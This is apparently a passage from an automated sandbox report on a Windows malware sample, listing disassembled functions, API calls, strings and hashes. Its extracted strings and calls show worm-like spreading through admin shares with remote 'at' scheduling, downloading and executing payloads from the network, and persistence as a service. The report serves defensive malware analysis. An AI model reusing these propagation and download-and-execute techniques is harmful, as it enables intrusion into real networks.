                                • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: sprintf$memset$AddressLibraryLoadProc$FileSleep$Connection2CopyExecLocalModuleNameTimelstrcmp
                                • String ID: "%s"$C:\g1fd.exe$CopyFileA$D:\g1fd.exe$E:\g1fd.exe$F:\g1fd.exe$KERNEL32.dll$KERNEL32.dll$NULL$WNetAddConnection2A$\\%s\C$\NewArean.exe$\\%s\D$\g1fd.exe$\\%s\E$\g1fd.exe$\\%s\F$\g1fd.exe$\\%s\admin$\g1fd.exe$\\%s\ipc$$admin$\$administrator$at \\%s %d:%d %s$lstrcpyA$mpr.dll
                                • API String ID: 3609035092-2620952620
                                • Opcode ID: c6549ada33351b0c644b47774686d60c5db2e3ebc40509c19cd79e523bc9d003
                                • Instruction ID: e53371337d95753037d5ff201a014897057a964265bdb027f625b62809e70f56
                                • Opcode Fuzzy Hash: c6549ada33351b0c644b47774686d60c5db2e3ebc40509c19cd79e523bc9d003
                                • Instruction Fuzzy Hash: EF810CB1D0065DBACF10ABE5CD89EDE7B7CAF4434AF1004B6F505F2190DA789A848F64

                                Control-flow Graph

                                APIs
                                • WSAStartup.WS2_32(00000202,?), ref: 00405992
                                  • Part of subcall function 004059F4: LoadLibraryA.KERNEL32(ADVAPI32.dll,RegCloseKey), ref: 00405A09
                                  • Part of subcall function 004059F4: GetProcAddress.KERNEL32(00000000), ref: 00405A10
                                  • Part of subcall function 004059F4: _mbscpy.MSVCRT(00000000,00000053), ref: 00405AC6
                                  • Part of subcall function 004059F4: _mbscat.MSVCRT ref: 00405AD7
                                  • Part of subcall function 004059F4: RegOpenKeyExA.KERNELBASE(80000002,00000000,00000000,000F003F,?), ref: 00405AF6
                                • StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 004059BB
                                • ExitProcess.KERNEL32 ref: 004059EE
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressCtrlDispatcherExitLibraryLoadOpenProcProcessServiceStartStartup_mbscat_mbscpy
                                • String ID: Defghi Klmnopqr Tuv$Defghi Klmnopqr Tuvwxyab Defg$Defghijk Mnopqrstu Wxyabcd Fghijklm Opq
                                • API String ID: 3970724158-1370363722
                                • Opcode ID: d3fd74ce98b53abc42bac9d52cecb53f35e43ddc26a07d1a38ab2e21b0d9893f
                                • Instruction ID: 2c600e66c56aa54e41322d3d423351a33ef688bbf1abba83ec879d044cf264d1
                                • Opcode Fuzzy Hash: d3fd74ce98b53abc42bac9d52cecb53f35e43ddc26a07d1a38ab2e21b0d9893f
                                • Instruction Fuzzy Hash: E8F090B0950209BBDB10BB919C0E7AE76B8EB0430AF40403AE501B00E2DBB85648CF6E

                                Control-flow Graph

                                [Control-flow graph: rendered node/edge list not reproduced]
                                APIs
                                • Sleep.KERNELBASE(00004650), ref: 0040408D
                                • LoadLibraryA.KERNEL32(kernel32.dll,?), ref: 004040CB
                                • GetProcAddress.KERNEL32(00000000), ref: 004040D4
                                • LoadLibraryA.KERNEL32(kernel32.dll,GetTempPathA), ref: 004040E0
                                • GetProcAddress.KERNEL32(00000000), ref: 004040E3
                                • LoadLibraryA.KERNEL32(WS2_32.dll,closesocket), ref: 004040F2
                                • GetProcAddress.KERNEL32(00000000), ref: 004040F5
                                • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcatA), ref: 00404104
                                • GetProcAddress.KERNEL32(00000000), ref: 00404107
                                  • Part of subcall function 00404044: socket.WS2_32(00000002,00000001,00000000), ref: 0040404E
                                  • Part of subcall function 00404044: connect.WS2_32(00000000,?,00000010), ref: 0040405E
                                  • Part of subcall function 00404044: closesocket.WS2_32(00000000), ref: 0040406A
                                  • Part of subcall function 00403492: setsockopt.WS2_32(?,0000FFFF,00000008,?,00000004), ref: 004034A8
                                  • Part of subcall function 00403492: WSAIoctl.WS2_32(?,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 004034DD
                                • memset.MSVCRT ref: 00404135
                                  • Part of subcall function 00406090: LoadLibraryA.KERNEL32(ADVAPI32.dll,RegCloseKey,76F8F550), ref: 004060A4
                                  • Part of subcall function 00406090: GetProcAddress.KERNEL32(00000000), ref: 004060AB
                                  • Part of subcall function 00406090: LoadLibraryA.KERNEL32(KERNEL32.dll,GetVersionExA), ref: 004060C1
                                  • Part of subcall function 00406090: GetProcAddress.KERNEL32(00000000), ref: 004060C8
                                  • Part of subcall function 00406090: GetSystemDefaultUILanguage.KERNEL32 ref: 004060D4
                                  • Part of subcall function 00406090: memset.MSVCRT ref: 004060F2
                                  • Part of subcall function 00406090: _mbscpy.MSVCRT(0000005D,0000004E), ref: 00406254
                                  • Part of subcall function 00406090: _mbscpy.MSVCRT(0000005D,2000), ref: 00406283
                                  • Part of subcall function 004034E5: wsprintfA.USER32 ref: 004034FC
                                  • Part of subcall function 004034E5: LoadLibraryA.KERNELBASE(?), ref: 0040350C
                                • memcpy.MSVCRT(?,?,000000B0), ref: 00404193
                                • send.WS2_32(?,?,00000000), ref: 004041B3
                                • memset.MSVCRT ref: 0040424A
                                • lstrcpyn.KERNEL32(00409328,?,00000080), ref: 004042EB
                                • lstrlen.KERNEL32(00409328,00000200), ref: 004042F7
                                • lstrcpyn.KERNEL32(004093A8,?), ref: 0040430A
                                • lstrcpyn.KERNEL32(004090E0,?,00000080), ref: 0040439B
                                • lstrlen.KERNEL32(004090E0,00000080), ref: 004043A7
                                • lstrcpyn.KERNEL32(00409160,?), ref: 004043BA
                                • lstrcpyn.KERNEL32(004091F8,?,00000104), ref: 004043DA
                                • GetDesktopWindow.USER32 ref: 00404485
                                • ShellExecuteA.SHELL32(00000000), ref: 0040448C
                                • OpenMutexA.KERNEL32(001F0001,00000000,Defghi Klmnopqr Tuv), ref: 0040449E
                                • ReleaseMutex.KERNEL32(00000000), ref: 004044AB
                                • CloseHandle.KERNEL32(00000000), ref: 004044B2
                                • wsprintfA.USER32 ref: 00404539
                                • LoadLibraryA.KERNEL32(urlmon.dll), ref: 00404557
                                • GetProcAddress.KERNEL32(00000000,URLDownloadToFileA), ref: 00404562
                                • GetTickCount.KERNEL32 ref: 004045C4
                                • wsprintfA.USER32 ref: 004045D7
                                • LoadLibraryA.KERNEL32(urlmon.dll), ref: 004045F5
                                • GetProcAddress.KERNEL32(00000000,URLDownloadToFileA), ref: 00404600
                                • WinExec.KERNEL32(?,00000000), ref: 00404632
                                • OpenMutexA.KERNEL32(001F0001,00000000,Defghi Klmnopqr Tuv), ref: 0040465B
                                • ReleaseMutex.KERNEL32(00000000), ref: 00404668
                                • CloseHandle.KERNEL32(00000000), ref: 0040466F
                                • memset.MSVCRT ref: 0040468A
                                • sprintf.MSVCRT ref: 0040472B
                                • SHDeleteKeyA.SHLWAPI(80000002,?), ref: 00404740
                                  • Part of subcall function 0040355B: LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcatA,00000000,Defghi Klmnopqr Tuv,00000000), ref: 00403571
                                  • Part of subcall function 0040355B: GetProcAddress.KERNEL32(00000000), ref: 00403578
                                  • Part of subcall function 0040355B: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004035D3
                                  • Part of subcall function 0040355B: GetShortPathNameA.KERNEL32(?,?,00000104), ref: 004035E8
                                  • Part of subcall function 0040355B: GetEnvironmentVariableA.KERNEL32(COMSPEC,?,00000104), ref: 004035FB
                                  • Part of subcall function 0040355B: ShellExecuteEx.SHELL32(0000003C), ref: 00403675
                                  • Part of subcall function 0040355B: SetPriorityClass.KERNEL32(?,00000040), ref: 00403689
                                  • Part of subcall function 0040355B: GetCurrentProcess.KERNEL32(00000100), ref: 00403690
                                  • Part of subcall function 0040355B: SetPriorityClass.KERNEL32(00000000), ref: 00403697
                                  • Part of subcall function 0040355B: GetCurrentThread.KERNEL32 ref: 0040369B
                                • ExitProcess.KERNEL32 ref: 00404755
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmp
                                • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmp
                                • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: LibraryLoad$AddressProc$lstrcpyn$Mutexmemset$wsprintf$ClassCloseCurrentExecuteHandleNameOpenPriorityProcessReleaseShell_mbscpylstrlen$CountDefaultDeleteDesktopEnvironmentExecExitFileIoctlLanguageModulePathShortSleepSystemThreadTickVariableWindowclosesocketconnectmemcpysendsetsockoptsocketsprintf
                                • String ID: %c%c%c%c%ccn.exe$%s%s$%s%s$.$C$C$Defghi Klmnopqr Tuv$E$F$GetTempPathA$KERNEL32.dll$M$S$S$S$S$T$URLDownloadToFileA$W$WS2_32.dll$Y$\$\$\$c$closesocket$e$e$e$e$e$e$e$e$e$e$e$i$i$i$i$kernel32.dll$kernel32.dll$l$l$l$lstrcatA$n$n$n$o$o$o$o$p$p$r$r$r$r$r$r$s$t$t$t$t$u$urlmon.dll$v$w$x$x
                                • API String ID: 2150264698-2364854850
                                • Opcode ID: 6b4924f4a127d18a0a032bdd380913539c2cdcbc85c7c5ccdd420771a7168c92
                                • Instruction ID: 67642873343b6f7d73ea264a9ba1336f7ce8e91893947de594fae40b13c7bc8e
                                • Opcode Fuzzy Hash: 6b4924f4a127d18a0a032bdd380913539c2cdcbc85c7c5ccdd420771a7168c92
                                • Instruction Fuzzy Hash: 16329771D042C8EEEB11DBA4CD48BDE7FB96B55304F0400A9E144B7292C7BE5A58CB7A

                                Control-flow Graph

                                [Control-flow graph: rendered node/edge list not reproduced]
                                APIs
                                • Sleep.KERNELBASE(00004650), ref: 004048BB
                                • LoadLibraryA.KERNEL32(kernel32.dll,?), ref: 004048F9
                                • GetProcAddress.KERNEL32(00000000), ref: 00404902
                                • LoadLibraryA.KERNEL32(kernel32.dll,GetTempPathA), ref: 0040490E
                                • GetProcAddress.KERNEL32(00000000), ref: 00404911
                                • LoadLibraryA.KERNEL32(WS2_32.dll,closesocket), ref: 00404920
                                • GetProcAddress.KERNEL32(00000000), ref: 00404923
                                • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcatA), ref: 00404932
                                • GetProcAddress.KERNEL32(00000000), ref: 00404935
                                  • Part of subcall function 0040484F: htons.WS2_32(00001F9A), ref: 00404861
                                  • Part of subcall function 0040484F: socket.WS2_32(00000002,00000001,00000000), ref: 0040487F
                                  • Part of subcall function 0040484F: connect.WS2_32(00000000,00000002,00000010), ref: 0040488E
                                  • Part of subcall function 0040484F: closesocket.WS2_32(00000000), ref: 0040489A
                                  • Part of subcall function 00403492: setsockopt.WS2_32(?,0000FFFF,00000008,?,00000004), ref: 004034A8
                                  • Part of subcall function 00403492: WSAIoctl.WS2_32(?,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 004034DD
                                • memset.MSVCRT ref: 00404963
                                  • Part of subcall function 00406090: LoadLibraryA.KERNEL32(ADVAPI32.dll,RegCloseKey,76F8F550), ref: 004060A4
                                  • Part of subcall function 00406090: GetProcAddress.KERNEL32(00000000), ref: 004060AB
                                  • Part of subcall function 00406090: LoadLibraryA.KERNEL32(KERNEL32.dll,GetVersionExA), ref: 004060C1
                                  • Part of subcall function 00406090: GetProcAddress.KERNEL32(00000000), ref: 004060C8
                                  • Part of subcall function 00406090: GetSystemDefaultUILanguage.KERNEL32 ref: 004060D4
                                  • Part of subcall function 00406090: memset.MSVCRT ref: 004060F2
                                  • Part of subcall function 00406090: _mbscpy.MSVCRT(0000005D,0000004E), ref: 00406254
                                  • Part of subcall function 00406090: _mbscpy.MSVCRT(0000005D,2000), ref: 00406283
                                  • Part of subcall function 004034E5: wsprintfA.USER32 ref: 004034FC
                                  • Part of subcall function 004034E5: LoadLibraryA.KERNELBASE(?), ref: 0040350C
                                • memcpy.MSVCRT(?,?,000000B0), ref: 004049C1
                                • send.WS2_32(?,?,00000000), ref: 004049E1
                                • memset.MSVCRT ref: 00404A78
                                • lstrcpyn.KERNEL32(00409328,?,00000080), ref: 00404B19
                                • lstrlen.KERNEL32(00409328,00000200), ref: 00404B25
                                • lstrcpyn.KERNEL32(004093A8,?), ref: 00404B38
                                • lstrcpyn.KERNEL32(004090E0,?,00000080), ref: 00404BC9
                                • lstrlen.KERNEL32(004090E0,00000080), ref: 00404BD5
                                • lstrcpyn.KERNEL32(00409160,?), ref: 00404BE8
                                • lstrcpyn.KERNEL32(004091F8,?,00000104), ref: 00404C08
                                • GetDesktopWindow.USER32 ref: 00404CB3
                                • ShellExecuteA.SHELL32(00000000), ref: 00404CBA
                                • OpenMutexA.KERNEL32(001F0001,00000000,Defghi Klmnopqr Tuv), ref: 00404CCC
                                • ReleaseMutex.KERNEL32(00000000), ref: 00404CD9
                                • CloseHandle.KERNEL32(00000000), ref: 00404CE0
                                • wsprintfA.USER32 ref: 00404D67
                                • LoadLibraryA.KERNEL32(urlmon.dll), ref: 00404D85
                                • GetProcAddress.KERNEL32(00000000,URLDownloadToFileA), ref: 00404D90
                                • GetTickCount.KERNEL32 ref: 00404DF2
                                • wsprintfA.USER32 ref: 00404E05
                                • LoadLibraryA.KERNEL32(urlmon.dll), ref: 00404E23
                                • GetProcAddress.KERNEL32(00000000,URLDownloadToFileA), ref: 00404E2E
                                • WinExec.KERNEL32(?,00000000), ref: 00404E60
                                • OpenMutexA.KERNEL32(001F0001,00000000,Defghi Klmnopqr Tuv), ref: 00404E89
                                • ReleaseMutex.KERNEL32(00000000), ref: 00404E96
                                • CloseHandle.KERNEL32(00000000), ref: 00404E9D
                                • memset.MSVCRT ref: 00404EB8
                                • sprintf.MSVCRT ref: 00404F59
                                • SHDeleteKeyA.SHLWAPI(80000002,?), ref: 00404F6E
                                  • Part of subcall function 0040355B: LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcatA,00000000,Defghi Klmnopqr Tuv,00000000), ref: 00403571
                                  • Part of subcall function 0040355B: GetProcAddress.KERNEL32(00000000), ref: 00403578
                                  • Part of subcall function 0040355B: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004035D3
                                  • Part of subcall function 0040355B: GetShortPathNameA.KERNEL32(?,?,00000104), ref: 004035E8
                                  • Part of subcall function 0040355B: GetEnvironmentVariableA.KERNEL32(COMSPEC,?,00000104), ref: 004035FB
                                  • Part of subcall function 0040355B: ShellExecuteEx.SHELL32(0000003C), ref: 00403675
                                  • Part of subcall function 0040355B: SetPriorityClass.KERNEL32(?,00000040), ref: 00403689
                                  • Part of subcall function 0040355B: GetCurrentProcess.KERNEL32(00000100), ref: 00403690
                                  • Part of subcall function 0040355B: SetPriorityClass.KERNEL32(00000000), ref: 00403697
                                  • Part of subcall function 0040355B: GetCurrentThread.KERNEL32 ref: 0040369B
                                • ExitProcess.KERNEL32 ref: 00404F83
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmp
                                • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmp
                                • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: LibraryLoad$AddressProc$lstrcpyn$Mutexmemset$wsprintf$ClassCloseCurrentExecuteHandleNameOpenPriorityProcessReleaseShell_mbscpylstrlen$CountDefaultDeleteDesktopEnvironmentExecExitFileIoctlLanguageModulePathShortSleepSystemThreadTickVariableWindowclosesocketconnecthtonsmemcpysendsetsockoptsocketsprintf
                                • String ID: %c%c%c%c%ccn.exe$%s%s$%s%s$.$C$C$Defghi Klmnopqr Tuv$E$F$GetTempPathA$KERNEL32.dll$M$S$S$S$S$T$URLDownloadToFileA$W$WS2_32.dll$Y$\$\$\$c$closesocket$e$e$e$e$e$e$e$e$e$e$e$i$i$i$i$kernel32.dll$kernel32.dll$l$l$l$lstrcatA$n$n$n$o$o$o$o$p$p$r$r$r$r$r$r$s$t$t$t$t$u$urlmon.dll$v$w$x$x
                                • API String ID: 2152970890-2364854850
                                • Opcode ID: 4f0d886bb70089ebf16781ed20cfd5bc5b80506e33529b3b2d0c9907bdf4c32f
                                • Instruction ID: 34a9ccf79dfd8e924b7e3463a5d7c06d8bd6e6ee9c35ded2589a275d78ef8857
                                • Opcode Fuzzy Hash: 4f0d886bb70089ebf16781ed20cfd5bc5b80506e33529b3b2d0c9907bdf4c32f
                                • Instruction Fuzzy Hash: 4B32A771D042C8EEEB11DBA4CD48BDEBFB96B55304F0400A9E144B7292C7BE5A58CB79

                                Control-flow Graph

                                • Control-flow graph (rendered image, not reproduced): function entry block at 0040387C; legend: Executed / Not Executed
                                APIs
                                • LoadLibraryA.KERNEL32(kernel32.dll,?), ref: 004038C0
                                • GetProcAddress.KERNEL32(00000000), ref: 004038C9
                                • LoadLibraryA.KERNEL32(kernel32.dll,GetTempPathA), ref: 004038D5
                                • GetProcAddress.KERNEL32(00000000), ref: 004038D8
                                • LoadLibraryA.KERNEL32(WS2_32.dll,closesocket), ref: 004038E7
                                • GetProcAddress.KERNEL32(00000000), ref: 004038EA
                                • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcatA), ref: 004038F9
                                • GetProcAddress.KERNEL32(00000000), ref: 004038FC
                                  • Part of subcall function 0040336C: LoadLibraryA.KERNEL32(WS2_32.dll,htons,76F8F550,76F90BD0,00000000), ref: 00403389
                                  • Part of subcall function 0040336C: GetProcAddress.KERNEL32(00000000), ref: 00403392
                                  • Part of subcall function 0040336C: LoadLibraryA.KERNEL32(WS2_32.dll,closesocket), ref: 0040339D
                                  • Part of subcall function 0040336C: GetProcAddress.KERNEL32(00000000), ref: 004033A0
                                  • Part of subcall function 0040336C: _mbscpy.MSVCRT(?,00000000,EhETHRcLHRAXHREQEAkLEwsTQw==), ref: 004033CF
                                  • Part of subcall function 0040336C: strstr.MSVCRT ref: 004033E0
                                  • Part of subcall function 0040336C: memset.MSVCRT ref: 004033F9
                                  • Part of subcall function 0040336C: strcspn.MSVCRT ref: 00403410
                                  • Part of subcall function 0040336C: strncpy.MSVCRT ref: 0040341B
                                  • Part of subcall function 0040336C: strcspn.MSVCRT ref: 0040342D
                                  • Part of subcall function 0040336C: atoi.MSVCRT(?), ref: 00403437
                                  • Part of subcall function 0040336C: socket.WS2_32(00000002,00000001,00000000), ref: 00403468
                                  • Part of subcall function 0040336C: connect.WS2_32(00000000,00000002,00000010), ref: 00403477
                                  • Part of subcall function 00403492: setsockopt.WS2_32(?,0000FFFF,00000008,?,00000004), ref: 004034A8
                                  • Part of subcall function 00403492: WSAIoctl.WS2_32(?,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 004034DD
                                • memset.MSVCRT ref: 0040392A
                                  • Part of subcall function 00406090: LoadLibraryA.KERNEL32(ADVAPI32.dll,RegCloseKey,76F8F550), ref: 004060A4
                                  • Part of subcall function 00406090: GetProcAddress.KERNEL32(00000000), ref: 004060AB
                                  • Part of subcall function 00406090: LoadLibraryA.KERNEL32(KERNEL32.dll,GetVersionExA), ref: 004060C1
                                  • Part of subcall function 00406090: GetProcAddress.KERNEL32(00000000), ref: 004060C8
                                  • Part of subcall function 00406090: GetSystemDefaultUILanguage.KERNEL32 ref: 004060D4
                                  • Part of subcall function 00406090: memset.MSVCRT ref: 004060F2
                                  • Part of subcall function 00406090: _mbscpy.MSVCRT(0000005D,0000004E), ref: 00406254
                                  • Part of subcall function 00406090: _mbscpy.MSVCRT(0000005D,2000), ref: 00406283
                                  • Part of subcall function 004034E5: wsprintfA.USER32 ref: 004034FC
                                  • Part of subcall function 004034E5: LoadLibraryA.KERNELBASE(?), ref: 0040350C
                                • memcpy.MSVCRT(?,?,000000B0), ref: 00403988
                                • send.WS2_32(?,?,00000000), ref: 004039A8
                                • memset.MSVCRT ref: 00403A3F
                                • lstrcpyn.KERNEL32(00409328,?,00000080), ref: 00403AE0
                                • lstrlen.KERNEL32(00409328,00000200), ref: 00403AEC
                                • lstrcpyn.KERNEL32(004093A8,?), ref: 00403AFF
                                • lstrcpyn.KERNEL32(004090E0,?,00000080), ref: 00403B90
                                • lstrlen.KERNEL32(004090E0,00000080), ref: 00403B9C
                                • lstrcpyn.KERNEL32(00409160,?), ref: 00403BAF
                                • lstrcpyn.KERNEL32(004091F8,?,00000104), ref: 00403BCF
                                • GetDesktopWindow.USER32 ref: 00403C7A
                                • ShellExecuteA.SHELL32(00000000), ref: 00403C81
                                • OpenMutexA.KERNEL32(001F0001,00000000,Defghi Klmnopqr Tuv), ref: 00403C93
                                • ReleaseMutex.KERNEL32(00000000), ref: 00403CA0
                                • CloseHandle.KERNEL32(00000000), ref: 00403CA7
                                • wsprintfA.USER32 ref: 00403D2E
                                • LoadLibraryA.KERNEL32(urlmon.dll), ref: 00403D4C
                                • GetProcAddress.KERNEL32(00000000,URLDownloadToFileA), ref: 00403D57
                                • GetTickCount.KERNEL32 ref: 00403DB9
                                • wsprintfA.USER32 ref: 00403DCC
                                • LoadLibraryA.KERNEL32(urlmon.dll), ref: 00403DEA
                                • GetProcAddress.KERNEL32(00000000,URLDownloadToFileA), ref: 00403DF5
                                • WinExec.KERNEL32(?,00000000), ref: 00403E27
                                • OpenMutexA.KERNEL32(001F0001,00000000,Defghi Klmnopqr Tuv), ref: 00403E50
                                • ReleaseMutex.KERNEL32(00000000), ref: 00403E5D
                                • CloseHandle.KERNEL32(00000000), ref: 00403E64
                                • memset.MSVCRT ref: 00403E7F
                                • sprintf.MSVCRT ref: 00403F20
                                • SHDeleteKeyA.SHLWAPI(80000002,?), ref: 00403F35
                                  • Part of subcall function 0040355B: LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcatA,00000000,Defghi Klmnopqr Tuv,00000000), ref: 00403571
                                  • Part of subcall function 0040355B: GetProcAddress.KERNEL32(00000000), ref: 00403578
                                  • Part of subcall function 0040355B: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004035D3
                                  • Part of subcall function 0040355B: GetShortPathNameA.KERNEL32(?,?,00000104), ref: 004035E8
                                  • Part of subcall function 0040355B: GetEnvironmentVariableA.KERNEL32(COMSPEC,?,00000104), ref: 004035FB
                                  • Part of subcall function 0040355B: ShellExecuteEx.SHELL32(0000003C), ref: 00403675
                                  • Part of subcall function 0040355B: SetPriorityClass.KERNEL32(?,00000040), ref: 00403689
                                  • Part of subcall function 0040355B: GetCurrentProcess.KERNEL32(00000100), ref: 00403690
                                  • Part of subcall function 0040355B: SetPriorityClass.KERNEL32(00000000), ref: 00403697
                                  • Part of subcall function 0040355B: GetCurrentThread.KERNEL32 ref: 0040369B
                                • ExitProcess.KERNEL32 ref: 00403F4A
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmp
                                • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmp
                                • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: LibraryLoad$AddressProc$lstrcpynmemset$Mutex$_mbscpywsprintf$ClassCloseCurrentExecuteHandleNameOpenPriorityProcessReleaseShelllstrlenstrcspn$CountDefaultDeleteDesktopEnvironmentExecExitFileIoctlLanguageModulePathShortSystemThreadTickVariableWindowatoiconnectmemcpysendsetsockoptsocketsprintfstrncpystrstr
                                • String ID: %c%c%c%c%ccn.exe$%s%s$%s%s$.$C$C$Defghi Klmnopqr Tuv$E$F$GetTempPathA$KERNEL32.dll$M$S$S$S$S$T$URLDownloadToFileA$W$WS2_32.dll$Y$\$\$\$c$closesocket$e$e$e$e$e$e$e$e$e$e$e$i$i$i$i$kernel32.dll$kernel32.dll$l$l$l$lstrcatA$n$n$n$o$o$o$o$p$p$r$r$r$r$r$r$s$t$t$t$t$u$urlmon.dll$v$w$x$x
                                • API String ID: 1435032172-2364854850
                                • Opcode ID: e18265d271f6721ab9e9e9466f504cf459dc78a50ec6928034f8974f6ee0d570
                                • Instruction ID: 357b4b9f15481a77607b06fd34d37290313e3d44ecd54a07aa5cfd399732b663
                                • Opcode Fuzzy Hash: e18265d271f6721ab9e9e9466f504cf459dc78a50ec6928034f8974f6ee0d570
                                • Instruction Fuzzy Hash: 65329871D042C8EEEB11DBA4CD48BDE7FB96B15305F0400A9E184B7292C7BE5A58CB79

                                Control-flow Graph

                                APIs
                                • LoadLibraryA.KERNEL32(WS2_32.dll,closesocket), ref: 004055D8
                                • GetProcAddress.KERNEL32(00000000), ref: 004055E1
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,SetServiceStatus), ref: 004055F1
                                • GetProcAddress.KERNEL32(00000000), ref: 004055F4
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,RegisterServiceCtrlHandlerA), ref: 004055FF
                                • GetProcAddress.KERNEL32(00000000), ref: 00405602
                                • SetServiceStatus.SECHOST(00000000,004090B8), ref: 00405655
                                • Sleep.KERNELBASE(000001F4), ref: 00405663
                                • LoadLibraryA.KERNEL32(0000004B,?), ref: 004056EF
                                • GetProcAddress.KERNEL32(00000000), ref: 004056F2
                                • LoadLibraryA.KERNEL32(KERNEL32.dll,Get), ref: 0040574A
                                • GetProcAddress.KERNEL32(00000000), ref: 0040574D
                                • LoadLibraryA.KERNEL32(KERNEL32.dll,?), ref: 0040578A
                                • GetProcAddress.KERNEL32(00000000), ref: 0040578D
                                • CreateMutexA.KERNELBASE(00000000,00000000,Defghi Klmnopqr Tuv), ref: 00405796
                                • exit.MSVCRT ref: 004057A7
                                • wsprintfA.USER32 ref: 004057D2
                                • CreateThread.KERNELBASE(00000000,00000000,Function_00002DD5,00000000,00000000,00000000), ref: 004057FF
                                • Sleep.KERNELBASE(000001F4), ref: 00405806
                                • WSAStartup.WS2_32(00000202,?), ref: 0040581E
                                • CreateThread.KERNELBASE(00000000,00000000,Function_00005182,00000000,00000000,00000000), ref: 0040582A
                                • WSAStartup.WS2_32(00000202,?), ref: 00405838
                                • CreateThread.KERNELBASE(00000000,00000000,Function_000051E3,00000000,00000000,00000000), ref: 00405844
                                • WaitForSingleObject.KERNEL32(00000000,000000FF,Function_0000387C,00000000), ref: 00405859
                                • CloseHandle.KERNEL32 ref: 00405865
                                • closesocket.WS2_32 ref: 00405871
                                • Sleep.KERNELBASE(0000012C), ref: 00405883
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmp
                                • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmp
                                • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressLibraryLoadProc$Create$SleepThread$Startup$CloseHandleMutexObjectServiceSingleStatusWaitclosesocketexitwsprintf
                                • String ID: A$ADVAPI32.dll$C$C$Defghi Klmnopqr Tuv$E$G$Get$I$KERNEL32.dll$L$M$RegisterServiceCtrlHandlerA$SetServiceStatus$T$WS2_32.dll$a$a$a$closesocket$d$d$e$e$e$e$e$e$h$hra%u.dll$n$o$r$r$r$r$r$r$r$s$t$t$t$t$t$u$u$x
                                • API String ID: 2081735817-3768298475
                                • Opcode ID: 0829bc5678a68e0c4557f189000b03db2788a54d9899d5a03469cd2d06e6fe48
                                • Instruction ID: 2b90b7f98aae210445e73ef680a1d9401666750c7211a7faab133c9ec65b4e0f
                                • Opcode Fuzzy Hash: 0829bc5678a68e0c4557f189000b03db2788a54d9899d5a03469cd2d06e6fe48
